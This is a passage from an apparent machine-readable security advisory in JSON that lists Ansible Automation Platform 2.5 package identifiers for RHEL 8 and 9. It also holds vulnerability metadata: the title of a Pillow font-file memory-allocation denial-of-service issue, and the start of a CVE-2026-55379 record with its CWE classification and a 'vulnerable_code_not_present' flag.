"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
